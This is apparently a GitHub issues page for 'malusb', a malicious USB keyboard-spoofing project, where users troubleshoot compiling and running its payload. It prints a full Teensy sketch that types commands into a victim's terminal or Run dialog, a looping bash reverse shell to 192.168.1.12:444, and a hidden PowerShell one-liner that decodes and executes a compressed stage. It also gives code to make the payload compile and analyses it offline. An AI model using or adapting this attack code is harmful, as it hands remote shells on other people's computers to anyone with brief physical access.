malusb's People

Contributors: ebursztein, jmichelp

malusb's Issues

Shell not persistent

Hello,
thank you for your great work!
I was testing your HID exploit on my Windows 10 machine and it successfully spawned a reverse shell on my Linux machine running Metasploit.
The only problem I have is that my shell is not persistent (as it should be, right?). After rebooting my Windows 10 PC the shell isn't connecting back. I have to plug in the Teensy again to get a new shell.

Did I do something wrong while compiling and loading it onto my Teensy? Is it a Windows 10 problem?
Or did I misunderstand the "persistent" part? I thought the shell would try to reconnect periodically.

Greetings!

Problems verifying configured payload code in Arduino

I created a payload_configured.c and copy-pasted the code into Arduino. When I hit Verify to upload it to the Teensy 3.2, it throws the following errors:

Arduino: 1.6.11 (Linux), TD: 1.30, Board: "Teensy 3.2 / 3.1, Serial + Keyboard + Mouse + Joystick, 96 MHz optimize speed (overclock), US English"

/root/Arduino/custommalusb1/custommalusb1.ino:20:27: warning: missing terminating " character [enabled by default]
 const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
                           ^
custommalusb1:20: error: missing terminating " character
 const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
 ^
/root/Arduino/custommalusb1/custommalusb1.ino:21:1: warning: missing terminating " character [enabled by default]
 ";
 ^
custommalusb1:21: error: missing terminating " character
/root/Arduino/custommalusb1/custommalusb1.ino:22:28: warning: missing terminating " character [enabled by default]
 const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
                            ^
custommalusb1:22: error: missing terminating " character
 const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
 ^
/root/Arduino/custommalusb1/custommalusb1.ino:29:53: warning: missing terminating ' character [enabled by default]
 k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
                                                     ^
custommalusb1:29: error: missing terminating ' character
 k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
 ^
custommalusb1:22: error: expected primary-expression before 'const'
 const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
 ^
custommalusb1: In function 'void win_payload()':
custommalusb1:366: error: 'WIN_PAYLOAD' was not declared in this scope
   type_command(WIN_PAYLOAD);
                ^
missing terminating " character

This report would have more information with
"Show verbose output during compilation"
option enabled in File -> Preferences.

This is the payload code:

[code]
/*
 * Malicious HID USB payload
 * https://github.com/LightWind/malusb
 *
 * Malicious chimera HID payload that creates a background reverse shell to the server of your choice.
 * Works both on Windows and OSX. See the README to know how to configure it.
 *
 * @see: https://www.elie.net/malusb for more information on HID spoofing devices.
 * @authors Elie Bursztein ([email protected]),  Jean Michel Picod ([email protected])
 * @licence: GPL v3
 */

#include <stdio.h>

/////////////////////////////////////////////////
/// Reverse shell payloads
/////////////////////////////////////////////////

/* These payload stubs need to be replaced with actual payloads to work */
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
";
const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
GH0I1ZPu1TlH5+oo14qDMejZw52qewGG/SSBhzmbwy66rR6BW1QcjIWOzsHSQvENWEMXaZ6KFqQl
fvJjTJPvVzShydgfTSYTRzcMc/oPbGE1lJ0TXFYHC8vVClcspnQcu/Xy9Tl+9XDNyNLC3lKQXNWt
fFhNp7+KdDYLBoHfjmaIf9/KWu0MytUOdNGAEEj3Ujo0Kg3qDWjkhxjk03TYy7KD0EdKnptcddve
ng/WMpOP6vCFruVa+oNbeq9bCwTXo3iEa3oD8sE2wSe95YW7hrg6ulG8tK2SAc1L24T+9SXxXdMK
IAS3zEHuoKwJrgZEdUYEKJKA4sBz2WT/xxEtDluYu1HOwSwGi0df2cmnh/8wnJ0ScPVJu3V+NozM
5JPaQJTtt9pl7wyjKFVdV8oa4RqNr78l6AXd9jZ6JzuSYHgTXpoU+R7eM4JBa6WX8eqjwLFPuYBS
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";

/////////////////////////////////////////////////
/// Internal constants
/////////////////////////////////////////////////

#define NUMLOCK 1
#define CAPSLOCK 2
#define SCROLLLOCK 4
#define LED_PIN 11 // Teensy pin for the led.


#define LOCK_KEY CAPSLOCK // Key used for testing end of command execution. NUMLOCK or CAPSLOCK or SCROLLLOCK.
#define LOCK_CHECK_WAIT_MS 100 // Time between lock checks in ms
#define LOCK_ATTEMPTS 10 // attempts to load the driver


#define DELAY 500 // delay between command

/////////////////////////////////////////////////
/// Lock related functions
/////////////////////////////////////////////////

/*!
 * Check the state of the lock key used for locking mechanism.
 */
boolean is_locked(void) {
  if ((keyboard_leds & LOCK_KEY) == LOCK_KEY) {
    return true;
  } else {
    return false;
  }
}


/*!
 * Toggle the selected lock key state.
 */
void toggle_lock(void) {
  unsigned short k;
  switch(LOCK_KEY) {
    case NUMLOCK:
      k = KEY_NUM_LOCK;
      break;
    case CAPSLOCK:
      k = KEY_CAPS_LOCK;
      break;
    case SCROLLLOCK:
      k = KEY_SCROLL_LOCK;
      break;
    default:
      break;
  }
  set_key(1, k);
  type_keys();
}


/*!
 * reset lock to unlock
 */
void reset_lock(void) {
  if (is_locked()) {
    toggle_lock();
  }
}

/////////////////////////////////////////////////
/// Utility functions
/////////////////////////////////////////////////

/*
 * Fingerprint OS X vs Win/Linux, based on the assumption that OS X does not
 * drive the Num Lock LED. Idea: try to toggle it; if the LED state does not
 * change it is OS X, else Win or Linux.
 * @note: not called from setup(); fingerprint_windows() is used instead.
 */
boolean is_osx() {
  int status1 = 0; //LED status before toggle
  int status2 = 0; //LED status after toggle
  unsigned short sk  = NUMLOCK; // LED bit mask, not a key code
  // Get status
  status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  delay(DELAY);

  //Toggle: press the actual Num Lock key (sk is only the LED bit)
  set_key(1, KEY_NUM_LOCK);
  type_keys();

  // Get status
  status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  clear_keys();
  is_done();

  if (status1 == status2) {
    return true;
  } else {
    return false;
  }
}


void set_modifier(unsigned short m) {
  Keyboard.set_modifier(m);
}

/*!
 * Set keyboard key values
 * @param position: the position of the key in [1, 6]
 * @param value: the key value
 */

void set_key(unsigned short position, unsigned short value) {
  switch(position) {
    case 1:
      Keyboard.set_key1(value);
      break;
    case 2:
      Keyboard.set_key2(value);
      break;
    case 3:
      Keyboard.set_key3(value);
      break;
    case 4:
      Keyboard.set_key4(value);
      break;
    case 5:
      Keyboard.set_key5(value);
      break;
    case 6:
      Keyboard.set_key6(value);
      break;
    default:
      break;
  }
}

/*!
 * Type the given key combination:
 * send the report, clear the keys and wait for the host to process them.
 */
void type_keys(void) {
  Keyboard.send_now();
  clear_keys();
  delay(DELAY);
}

/*!
 * Type a command line including "ENTER":
 * send the text, then Enter, then wait for the host to process them.
 */
void type_command(const char* cmd) {
  Keyboard.print(cmd);
  Keyboard.send_now();
  delay(DELAY);

  Keyboard.println("");
  Keyboard.send_now();
  delay(DELAY * 4);
  clear_keys();
}


/*!
 * Clear the keyboard report (all keys and modifiers).
 */
void clear_keys (void){

  // reset all keys
  for (int i = 1; i < 7; i++)
    set_key(i, 0);

  // reset modifier
  set_modifier(0);
  Keyboard.send_now();
  delay(DELAY);
}

/*!
 * Wait until the host driver is loaded and the Teensy is active.
 *
 * The idea behind this is to blink the onboard LED and then try to set
 * our lock key. Once the host echoes the lock LED back we are ready.
 *
 * @note: Idea from Offsec Peensy code
 */
void wait_for_drivers(void) {
  //until we are ready
  for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
    digitalWrite(LED_PIN, HIGH);
    digitalWrite(LED_PIN, LOW);
    delay(LOCK_CHECK_WAIT_MS);
    toggle_lock();
  }

  // maybe it is seen as a new keyboard; dismiss the dialog (Cmd+Q)
  if (!is_locked()) {
    osx_close_windows();
  }

  //resetting lock
  reset_lock();
  delay(100);
}


/*!
 * Check that a command has been processed by testing the lock key:
 * toggle it and block until the host echoes the new LED state.
 */
void is_done (void) {
  boolean current_lock = is_locked();
  toggle_lock();
  while(is_locked() == current_lock) {
    delay(LOCK_CHECK_WAIT_MS);
  }
  reset_lock();
}


/////////////////////////////////////////////////
/// Payload functions
/////////////////////////////////////////////////
/*
char* build_payload(const char* payload_template) {
  bzero(payload_osx, PAYLOAD_OSX_SIZE);
  snprintf(payload_osx, PAYLOAD_OSX_SIZE, payload_template, MSF_IP, MSF_PORT);
  return payload_osx;
}
*/

/////////////////////////////////////////////////
/// OSX functions
/////////////////////////////////////////////////

/** quit the frontmost application (Cmd+Q) **/
void osx_close_windows(void) {
  set_modifier(MODIFIERKEY_RIGHT_GUI);
  set_key(1, KEY_Q);
  type_keys();
}

/** open spotlight application to launch other apps **/
void osx_open_spotlight(void) {
  set_modifier(MODIFIERKEY_RIGHT_GUI);
  set_key(1, KEY_SPACE);
  type_keys();
}

void osx_hide_windows(void) {
  // hide every other application (Cmd+Option+H)
  set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
  set_key(1, KEY_H);
  type_keys();

  // minimize all windows of the front application (Cmd+Option+M)
  set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
  set_key(1, KEY_M);
  type_keys();

  // both together
  set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
  set_key(1, KEY_M);
  set_key(2, KEY_H);
  type_keys();
}

/** OSX payload delivery **/
void osx_exec_payload(void) {
  //hide all the window
  osx_hide_windows();

  //spotlight
  osx_open_spotlight();

  //terminal
  type_command("terminal");

  //payload
  type_command(OSX_PAYLOAD);

  //cleanup
  osx_close_windows();
}

/////////////////////////////////////////////////
/// Windows functions
/////////////////////////////////////////////////

/*
 * Fingerprinting technique using powershell
 * @credit NFC
 *
 */
bool fingerprint_windows(void) {
  int status1 = 0; //LED status before toggle
  int status2 = 0; //LED status after toggle
  unsigned short sk  = SCROLLLOCK;

  // Get status
  status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  delay(DELAY);


  //Asking windows to set SCROLLLOCK
  win_open_execute();
  type_command("powershell -Command \"(New-Object -ComObject WScript.Shell).SendKeys('{SCROLLLOCK}')\"");
  delay(DELAY);

  // Get status
  status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  is_done();

  if (status1 != status2) {
    return true;
  } else {
    return false;
  }
}


void win_open_execute(void) {
  // Windows key + R
  set_modifier(MODIFIERKEY_GUI);
  set_key(1, KEY_R);
  type_keys();
}

void win_payload(void) {
  // Run dialog (Win+R)
  win_open_execute();

  //cmd
  type_command("cmd");

  //run payload
  type_command(WIN_PAYLOAD);
}

/*
 * Main function
 */
void setup() {
  pinMode(LED_PIN, OUTPUT); // needed for the LED blink in wait_for_drivers()
  //wait until the host has enumerated the keyboard and is ready
  wait_for_drivers();
  clear_keys();
  if (fingerprint_windows() == true) {
    win_payload();
  } else {
    osx_exec_payload();
  }
}

/*
 * Code that needs to run repeatedly goes here.
 * @note: unused, the payload runs once from setup().
 */
void loop() {}
[/code]
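The two errors above have one cause: a raw line break inside a string literal. In OSX_PAYLOAD the closing quote sits on the following line, and in WIN_PAYLOAD the Base64 blob is wrapped over eight lines. C and C++ do not allow a newline inside "...", but adjacent literals separated only by whitespace are joined by the compiler, which is how a long payload fits in the sketch. The generator below is an added example, not code from malusb or its authors: it escapes a payload string, emits it as a wrapped sequence of adjacent literals, and includes a small lexer that reads the declaration back the way the compiler does, so a round trip proves the literal is well-formed and the broken form is rejected with the compiler's own complaint. The two payload texts in it are constructed samples with the same shape as the stubs above (the Windows one carries a placeholder instead of the real Base64 blob).

```python
"""Emit a payload string as a well-formed, line-wrapped C string literal."""

# Constructed sample payloads with the same shape as the stubs in the sketch.
OSX_PAYLOAD_TEXT = ('(nohup bash -c "while true;do bash -i >& /dev/tcp/192.168.1.12/444 '
                    '0>&1 2>&1; sleep 1;done" 1>/dev/null &)')
WIN_PAYLOAD_TEXT = ('powershell -exec bypass -nop -W hidden -noninteractive -Command '
                    "\"& {$t='placeholder stage, not the real Base64 blob';IEX $t }\";exit")

# One escape per source character; a chunk boundary can then never split an escape.
_ESCAPES = {'\\': '\\\\', '"': '\\"', '\n': '\\n', '\t': '\\t', '?': '\\?'}
_UNESCAPES = {v[1]: k for k, v in _ESCAPES.items()}


def c_escape_units(text):
    """Split text into the escape units of a double-quoted C literal."""
    units = []
    for ch in text:
        if ch in _ESCAPES:
            units.append(_ESCAPES[ch])
        elif 0x20 <= ord(ch) < 0x7F:
            units.append(ch)
        else:
            # Keyboard.print() types ASCII; anything else will not survive as a keystroke.
            raise ValueError('%r is not typeable as a plain HID keystroke' % ch)
    return units


def c_string_declaration(name, text, width=76):
    """Return `const char* NAME = "..." "...";` using adjacent-literal concatenation."""
    pieces, current = [], ''
    for unit in c_escape_units(text):
        if current and len(current) + len(unit) > width:
            pieces.append(current)
            current = ''
        current += unit
    pieces.append(current)
    body = '\n'.join('    "%s"' % piece for piece in pieces)
    return 'const char* %s =\n%s;' % (name, body)


def parse_c_literal(source):
    """Lex a `"..." "..."` sequence the way the compiler does.

    Raises ValueError with the compiler's own complaint when a line break
    occurs before the closing quote.
    """
    out, i, n = [], 0, len(source)
    while i < n:
        if source[i].isspace():
            i += 1
            continue
        if source[i] != '"':
            raise ValueError('expected opening quote at offset %d' % i)
        i += 1
        while True:
            if i >= n or source[i] == '\n':
                raise ValueError('missing terminating " character')
            ch = source[i]
            if ch == '"':
                i += 1
                break
            if ch == '\\':
                if i + 1 >= n or source[i + 1] not in _UNESCAPES:
                    raise ValueError('unsupported escape at offset %d' % i)
                out.append(_UNESCAPES[source[i + 1]])
                i += 2
            else:
                out.append(ch)
                i += 1
    return ''.join(out)


def declaration_value(declaration):
    """Strip `const char* NAME =` and the trailing `;`, then lex the literal(s)."""
    literal = declaration.split('=', 1)[1].rstrip().rstrip(';')
    return parse_c_literal(literal)


def round_trip(name, text):
    """True when the generated declaration reads back to exactly `text`."""
    return declaration_value(c_string_declaration(name, text)) == text


def is_well_formed(declaration):
    """False when the compiler would report a missing terminating quote."""
    try:
        declaration_value(declaration)
        return True
    except ValueError:
        return False


if __name__ == '__main__':
    print(c_string_declaration('OSX_PAYLOAD', OSX_PAYLOAD_TEXT))
    print(c_string_declaration('WIN_PAYLOAD', WIN_PAYLOAD_TEXT))
```

Paste the printed declarations in place of the two stub lines; the wrapped pieces are one string to the compiler, so type_command() still receives a single command line.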
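The following triage script is an added example, not part of malusb: it pulls the callback address out of OSX_PAYLOAD and unpacks the Windows stage offline the same way the one-liner does in memory (Base64, then gzip), without executing anything. The two payload strings are the values from the listing above with the C escapes resolved and the wrapped Base64 lines joined; the build time and uncompressed size it reports come from the gzip header and trailer of that blob. It also checks for the `while true ... done` retry loop, which is the only thing in OSX_PAYLOAD that keeps the shell coming back: it reconnects while the nohup'd bash survives, and nothing in OSX_PAYLOAD registers at boot or logon. What the Windows stage does is only visible after decoding it.

```python
"""Triage the two reverse-shell payload strings from the sketch above (offline, nothing executed)."""
import base64
import datetime
import gzip
import re
import struct

# The sketch's own values as plain Python strings: C escapes resolved and the
# wrapped Base64 lines joined back together. Nothing here is constructed.
OSX_PAYLOAD = ('(nohup bash -c "while true;do bash -i >& /dev/tcp/192.168.1.12/444 '
               '0>&1 2>&1; sleep 1;done" 1>/dev/null &)')

WIN_STAGE_B64 = (
    "H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T"
    "GH0I1ZPu1TlH5+oo14qDMejZw52qewGG/SSBhzmbwy66rR6BW1QcjIWOzsHSQvENWEMXaZ6KFqQl"
    "fvJjTJPvVzShydgfTSYTRzcMc/oPbGE1lJ0TXFYHC8vVClcspnQcu/Xy9Tl+9XDNyNLC3lKQXNWt"
    "fFhNp7+KdDYLBoHfjmaIf9/KWu0MytUOdNGAEEj3Ujo0Kg3qDWjkhxjk03TYy7KD0EdKnptcddve"
    "ng/WMpOP6vCFruVa+oNbeq9bCwTXo3iEa3oD8sE2wSe95YW7hrg6ulG8tK2SAc1L24T+9SXxXdMK"
    "IAS3zEHuoKwJrgZEdUYEKJKA4sBz2WT/xxEtDluYu1HOwSwGi0df2cmnh/8wnJ0ScPVJu3V+NozM"
    "5JPaQJTtt9pl7wyjKFVdV8oa4RqNr78l6AXd9jZ6JzuSYHgTXpoU+R7eM4JBa6WX8eqjwLFPuYBS"
    "k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=="
)
WIN_PAYLOAD = (
    'powershell -exec bypass -nop -W hidden -noninteractive -Command "& {'
    "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + WIN_STAGE_B64 + "'));"
    "$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
    '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }";exit'
)


def callback_from_osx_payload(cmd):
    """(host, port) of the bash /dev/tcp reverse shell, or None."""
    m = re.search(r'/dev/tcp/([^/\s]+)/(\d+)', cmd)
    return (m.group(1), int(m.group(2))) if m else None


def reconnects_in_loop(cmd):
    """True when the shell is wrapped in a retry loop (reconnects only while the process lives)."""
    return re.search(r'while\s+true\s*;\s*do\b.*\bdone\b', cmd) is not None


def powershell_options(cmd):
    """Options given before -Command, e.g. {'exec': 'bypass', 'W': 'hidden', 'nop': True}."""
    tokens = cmd.split('-Command', 1)[0].split()[1:]
    opts, i = {}, 0
    while i < len(tokens):
        name = tokens[i].lstrip('-')
        if i + 1 < len(tokens) and not tokens[i + 1].startswith('-'):
            opts[name] = tokens[i + 1]
            i += 2
        else:
            opts[name] = True
            i += 1
    return opts


def stage_blob(cmd):
    """The raw gzip stream handed to GzipStream, i.e. the Base64 argument decoded."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=\s]+)'\)", cmd)
    if not m:
        raise ValueError('no FromBase64String() argument found')
    return base64.b64decode(re.sub(r'\s+', '', m.group(1)), validate=True)


def gzip_info(blob):
    """Header and trailer fields: build time, producing OS and uncompressed size."""
    if blob[:3] != b'\x1f\x8b\x08':
        raise ValueError('not a gzip stream (bad magic/method)')
    mtime, = struct.unpack('<I', blob[4:8])
    isize, = struct.unpack('<I', blob[-4:])
    built = datetime.datetime.fromtimestamp(mtime, datetime.timezone.utc)
    return {'mtime': mtime, 'built_utc': built.isoformat(), 'os': blob[9], 'isize': isize}


def decode_stage(cmd):
    """Do offline what the one-liner does in memory (Base64 -> gunzip) and return the script bytes."""
    return gzip.decompress(stage_blob(cmd))


if __name__ == '__main__':
    print('OSX callback:', callback_from_osx_payload(OSX_PAYLOAD),
          'retry loop:', reconnects_in_loop(OSX_PAYLOAD))
    print('PowerShell options:', powershell_options(WIN_PAYLOAD))
    info = gzip_info(stage_blob(WIN_PAYLOAD))
    print('stage built %s on os=%d, %d bytes after gunzip' % (info['built_utc'], info['os'], info['isize']))
    print(decode_stage(WIN_PAYLOAD).decode('utf-8', 'replace')[:200])
```

Treat the decoded script as hostile text to read, not to paste into a shell; the option set it parses out (-exec bypass, -nop, -W hidden) is the same set a process-creation log would show for this payload.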

Payload won't execute on windows

The Windows payload relies on Windows somehow automatically entering the payload in a command window or in the 'Run' program. However, this is not how Windows works.

When the USB drive gets inserted and it starts to send out the payload keystrokes, it will result in nothing, or at the very best a focused text box receiving these keystrokes (a similar issue has been reported for Mac).

To fix this on Windows, send a Windows key + R combination before the payload to open the Run dialog.

Teensy 3.2 code

The code executes on Windows and OS X as expected; however, I do not get any sessions on the attacking machine after having set up a listener with the osx/x64x/reverse_shell_tcp handler.

Launching code in OSX fails

I've been trying to run the code on OS X, but when I plug in the Teensy, Spotlight opens and the commands are typed into it, causing it to fail. I inserted the Teensy while a web browser was open on the computer.
